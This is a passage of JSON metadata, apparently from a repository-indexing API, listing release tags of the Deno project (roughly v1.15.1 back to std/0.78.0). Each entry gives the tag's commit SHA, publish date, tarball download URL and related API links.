b/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.7